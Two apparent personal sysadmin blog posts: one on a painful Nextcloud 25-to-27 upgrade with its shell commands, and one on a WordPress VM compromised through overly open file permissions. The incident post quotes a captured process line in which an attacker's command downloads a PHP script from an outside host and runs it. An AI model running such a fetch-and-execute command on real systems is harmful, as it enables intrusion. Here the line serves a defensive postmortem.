Nextcloud upgrade woes

I have been self-hosting a Nextcloud instance for almost two years. It is a LAMP stack in a Proxmox LXC container running Debian 11, with PHP 7.4.

Up until Nextcloud 25, everything was fine. I have always used the web updater for both minor and major Nextcloud upgrades. It wasn't always smooth sailing (sometimes I needed to drop into the command line for some post-upgrade chores), but generally speaking things worked as intended.

A few months ago, I heard Nextcloud 26 would drop support for PHP 7.4, which meant Debian 11 would not be able to upgrade to Nextcloud 26. That was fine, because Debian 12 was just around the corner. I could rock 25 until Debian 12 came out in the summer.

Fast forward to yesterday: I decided to upgrade my LXC container to Debian 12 and Nextcloud from 25 to 27, since both projects had just shipped major releases within the last week. How exciting! Strangely enough, the Nextcloud web interface, under "Administration settings", didn't even report that version 26 or 27 was available.

I thought "Fine, I will upgrade Debian first and then use Nextcloud web updater". Turns out, Debian upgrade went very smoothly; all php packages were bumped from 7.2 to 8.2; reboot, done. However, Nextcloud cannot be opened, the web interface says something like "This version of Nextcloud is not compatible with PHP>=8.2. You are currently running 8.2.7". I start to grind my teeth as Nextcloud throws me into this hoop. "Fine, I will manually upgrade".

Following the How to upgrade guide, I downloaded latest.zip from the Nextcloud website and started the (painful) process:

  • turn maintenance mode on
  • unzip the file
  • copy everything except config and data into the document root located at /var/www/nextcloud
  • make sure user, group and permissions are correct
  • add “apc.enable_cli = 1” to the PHP CLI config because of this bug
  • run sudo -u www-data php occ upgrade
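
In shell terms, the whole dance looked roughly like the following. Treat it as a sketch, not a recipe: the /var/www/nextcloud path, the temporary unzip location, and the PHP 8.2 CLI config file are from my setup.

cd /var/www
# put the instance into maintenance mode first
sudo -u www-data php nextcloud/occ maintenance:mode --on
# unzip somewhere temporary; latest.zip extracts into a "nextcloud" directory
unzip ~/latest.zip -d /tmp/nc-new
# copy the new release over the old one, keeping config/ and data/
sudo rsync -a --exclude=config --exclude=data /tmp/nc-new/nextcloud/ nextcloud/
sudo chown -R www-data:www-data nextcloud
# work around the APCu CLI bug mentioned above
echo 'apc.enable_cli = 1' | sudo tee -a /etc/php/8.2/cli/php.ini
# run the actual upgrade and leave maintenance mode
sudo -u www-data php nextcloud/occ upgrade
sudo -u www-data php nextcloud/occ maintenance:mode --off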

Of course it didn't work. I went to the web interface to see why; it said "Updates between multiple major versions are unsupported". You could hear me grinding my teeth from across the street.

Finally, after a lot of faffing about, I downloaded Nextcloud 26.0.2 and successfully upgraded to it first. However, that was not the end of the misery. As usual, a major upgrade always needs some cleaning up. I got half a dozen warnings under "Administration settings": PHP memory_limit too low, file hash mismatches, a failed cron job, and so on. They were not difficult to fix, just hella annoying.
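
For what it's worth, this kind of cleanup mostly boils down to a few occ calls plus a php.ini tweak. A rough sketch, assuming the same /var/www/nextcloud install; the exact warnings (and therefore the exact commands) vary between instances:

# run Nextcloud's built-in repair steps and re-check core file integrity
sudo -u www-data php /var/www/nextcloud/occ maintenance:repair
sudo -u www-data php /var/www/nextcloud/occ integrity:check-core
# add the database indices the admin page complains about
sudo -u www-data php /var/www/nextcloud/occ db:add-missing-indices
# the memory_limit warning is fixed in the FPM php.ini, e.g.:
#   /etc/php/8.2/fpm/php.ini  ->  memory_limit = 512M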

Just thinking about the 26-to-27 upgrade, which will put me through (some of) the rigmarole again, makes me tired already. This process is stressful and tedious, especially for something you only need to do every half a year. It periodically reminds me of the bad old days of system administration. Maybe I should've opted for the Docker container deployment, I don't know.

On the flip side, thank goodness I have ZFS snapshots for the container and the data directory. Should something go wrong, I can always roll back.
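
The snapshot routine itself is trivial. The dataset names below are made up, but the idea is simply a snapshot before every upgrade and a rollback when things go sideways:

# hypothetical dataset names for the LXC rootfs and the Nextcloud data mount
zfs snapshot rpool/data/subvol-101-disk-0@pre-upgrade
zfs snapshot tank/nextcloud-data@pre-upgrade
# if the upgrade blows up, roll both back
zfs rollback rpool/data/subvol-101-disk-0@pre-upgrade
zfs rollback tank/nextcloud-data@pre-upgrade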

A Close Call: How a WordPress Site Was Almost Hacked

Background

I have a few spare VMs running in the cloud, waiting to be put to use. These VMs are provisioned using Ansible but are not in production. One of them hosts a WordPress site on a basic LAMP stack. The only ports open to the world are SSH and HTTP/HTTPS. I should add that sshd is configured to use key authentication only, as any sane person would do.
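
For the record, "key authentication only" is easy to verify by dumping sshd's effective settings; this is just a sanity check, nothing clever:

# confirm password logins are off and key auth is on
sudo sshd -T | grep -iE 'passwordauthentication|pubkeyauthentication|permitrootlogin'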

This particular VM runs Debian 11 and has 1 GB of RAM. It serves the sample page that comes with WordPress, with little to no configuration other than the WP 2FA and W3 Total Cache plug-ins.

How I found out

I occasionally visit the website URL to check that everything is working. Strangely enough, one day the website was unreachable. I tried to SSH into the VM and the connection timed out. As a last resort, I went to the cloud provider's dashboard and rebooted the VM. As a side note, I had uninstalled all the diagnostics agent software pre-installed by the cloud provider just to keep the tiny VM lean, so I could not monitor the VM from the dashboard.

After the VM came back from the reboot, the website loaded and I could SSH in. Everything seemed functional again. However, it didn't last long: a few hours later when I checked in, the VM had locked up and the same thing happened all over again.

Investigation

After a few more reboots, I decided to investigate the root cause of this strange behaviour. I highly doubted that the website had become too popular: it's just a blank site with almost zero traffic. The Apache configuration is kept at its defaults; the php-fpm configuration is tuned to the conservative side with very few workers. I started a bench test from another VM using the apache2-utils package:

~$ ab -c30 -t30 'https://example.com/?cat=1'

This command hammers the site with 30 concurrent connections for up to 30 seconds from the other VM, stress testing the PHP processing. As expected, the site handled the test just fine, without any significant RAM usage.

As I dug deeper into the process tree, it didn't take me long to find out that the memory was slowly being eaten by PHP processes. It happened gradually over the course of a few hours, until all memory was consumed by php-fpm and the OOM killer finally kicked in. A quick systemctl status -l php7.4-fpm.service gave the following info:

● php7.4-fpm.service - The PHP 7.4 FastCGI Process Manager
     Loaded: loaded (/lib/systemd/system/php7.4-fpm.service; enabled; vendor preset: enabled)
     Active: active (running) since Sun 2022-03-06 23:11:47 EST; 1h 13min ago
       Docs: man:php-fpm7.4(8)
    Process: 650 ExecStartPost=/usr/lib/php/php-fpm-socket-helper install /run/php/php-fpm.sock /etc/php/7.4/fpm/pool.d/www.conf 74 (code=exited, s>
   Main PID: 482 (php-fpm7.4)
     Status: "Processes active: 2, idle: 14, Requests: 166, slow: 0, Traffic: 0req/sec"
      Tasks: 75 (limit: 1128)
     Memory: 773.4M
        CPU: 14min 29.690s
     CGroup: /system.slice/php7.4-fpm.service
             ├─   482 php-fpm: master process (/etc/php/7.4/fpm/php-fpm.conf)
             ├─   649 php-fpm: pool www
             ├─   750 php-fpm: pool www
             ├─   753 php-fpm: pool www
             ├─   768 php-fpm: pool www
             ├─ 56725 php-fpm: pool www
             ├─ 56736 php-fpm: pool www
             ├─ 56737 php-fpm: pool www
             ├─ 92508 php-fpm: pool www
             ├─ 92528 php-fpm: pool www
             ├─ 92529 php-fpm: pool www
             ├─ 92587 php-fpm: pool www
             ├─ 98783 sh -c wget http://32868.port0.org/st/get_xleet.txt -O inc.class.xleet.php; php inc.class.xleet.php
             ├─ 98848 php inc.class.xleet.php
             ├─107565 sh -c php inc.class.xleet.ph

The last three processes immediately sent a chill down my spine. Why is it downloading and executing an arbitrary PHP script? This is bad.

A quick ls -lA on the document root:

total 344
-rw-r--r--  1 www-data www-data  8197 Mar  7 15:21 .htaccess
-rwxr-xr-x  1 www-data www-data  2067 Feb 21 20:19 3index.php
-rw-r--r--  1 www-data www-data   362 Feb 16 11:25 accesson.php
-rw-r--r--  1 www-data www-data 16090 Mar  7 16:18 angry.txt
drwxr-xr-x  3 www-data www-data  4096 Feb 22 09:36 assets
-rw-r--r--  1 www-data www-data  1194 Mar  7 16:18 inc.class.xleet.php
-rwxr-xr-x  1 www-data www-data   405 Feb 22 19:35 index.php
-rwxr-xr-x  1 www-data www-data 19915 Mar  7 15:32 license.txt
-rw-r--r--  1 www-data www-data 12484 Mar  7 16:18 list.txt
-rwxr-xr-x  1 www-data www-data  2012 Nov 10 09:31 old-index.php
-rw-r--r--  1 www-data www-data    29 Feb 21 20:19 on.php
-rwxr-xr-x  1 www-data www-data  7437 Mar  7 15:32 readme.html
-rwxr-xr-x  1 www-data www-data   556 Oct 29 23:53 robots.txt
-rw-r--r--  1 www-data www-data 10445 Mar  7 16:18 roll.txt
-rwxr-xr-x  1 www-data www-data 16290 Oct 29 23:51 store.php
-rw-r--r--  1 www-data www-data  1219 Feb 22 19:35 unzip.php
-rwxr-xr-x  1 www-data www-data  2094 Nov 10 10:21 wikindex.php
drwxr-xr-x  8 www-data www-data  4096 Oct 29 16:10 wordpress
-rwxr-xr-x  1 www-data www-data  7165 Jan 20  2021 wp-activate.php
drwxr-xr-x  9 www-data www-data  4096 Dec 31  1969 wp-admin
-rwxr-xr-x  1 www-data www-data  7246 Nov 10 09:31 wp-admin.php
-rwxr-xr-x  1 www-data www-data   351 Feb  6  2020 wp-blog-header.php
-rwxr-xr-x  1 www-data www-data  2338 Feb  1 12:35 wp-comments-post.php
-rwxr-xr-x  1 www-data www-data  3001 Feb  1 12:35 wp-config-sample.php
-rwxr-xr-x  1 www-data www-data  3383 Sep 15 22:08 wp-config.php
drwxr-xr-x 10 www-data www-data  4096 Mar  7 15:33 wp-content
-rwxr-xr-x  1 www-data www-data  3939 Jul 30  2020 wp-cron.php
drwxr-xr-x 26 www-data www-data 12288 Feb  1 12:35 wp-includes
-rwxr-xr-x  1 www-data www-data  2496 Feb  6  2020 wp-links-opml.php
-rwxr-xr-x  1 www-data www-data  3900 May 15  2021 wp-load.php
-rwxr-xr-x  1 www-data www-data 47916 Feb  1 12:35 wp-login.php
-rwxr-xr-x  1 www-data www-data  8582 Feb  1 12:35 wp-mail.php
-rwxr-xr-x  1 www-data www-data 23025 Feb  1 12:35 wp-settings.php
-rwxr-xr-x  1 www-data www-data 31959 Feb  1 12:35 wp-signup.php
-rwxr-xr-x  1 www-data www-data  4747 Oct  8  2020 wp-trackback.php
-rwxr-xr-x  1 www-data www-data  3236 Jun  8  2020 xmlrpc.php

Clearly some unknown files were being created (like angry.txt), along with the BIG RED ALERT inc.class.xleet.php. I tried to delete those files, and they kept popping up. I also noticed the odd permissions in the document root: 755 on plain files seems far too open. However, no time to think! I quickly removed the document root entirely and went on to check the system logs for any bigger problem. Luckily I didn't find any evidence that the rest of the VM had been compromised.
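
In hindsight, a rough sweep for recently modified PHP files is a quick way to gauge how much junk gets dropped in; nothing forensic, just a quick look (web root path assumed):

# any PHP file under the web root modified within the last three days
sudo find /var/www -type f -name '*.php' -mtime -3 -exec ls -l {} +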

Back to WordPress: I downloaded a fresh installer, whose default permissions are conservative (644 for the most part). After extracting it and serving the site again, the rogue PHP scripts did not make a comeback.
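
For reference, forcing a WordPress tree back to those conservative defaults only takes a few commands; the document root path here is just my layout:

# directories 755, files 644, everything owned by the web user
sudo chown -R www-data:www-data /var/www/wordpress
sudo find /var/www/wordpress -type d -exec chmod 755 {} +
sudo find /var/www/wordpress -type f -exec chmod 644 {} +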

Postmortem

I am not a security expert, but this was serious enough for me to reflect on and draw a lesson from. The most likely scenario is that the file permissions in the document root were too open, and either the www-data user or the php-fpm process was compromised as a result.

It was ultimately due to a misconfiguration in my Ansible playbook, which extracts the WordPress tarball and resets the permissions to 755. Thank goodness this was the only affected machine, as the other WordPress sites I administer were set up by hand.

Lastly, I removed this VM entirely as a precaution.

Takeaways

There are three lessons I learned:

  1. When something strange happens, take it seriously and investigate; it's a sysadmin's responsibility
  2. Don't mess with default permissions without a good reason
  3. Examine the automation code carefully before pushing; convenience can sometimes be a double-edged sword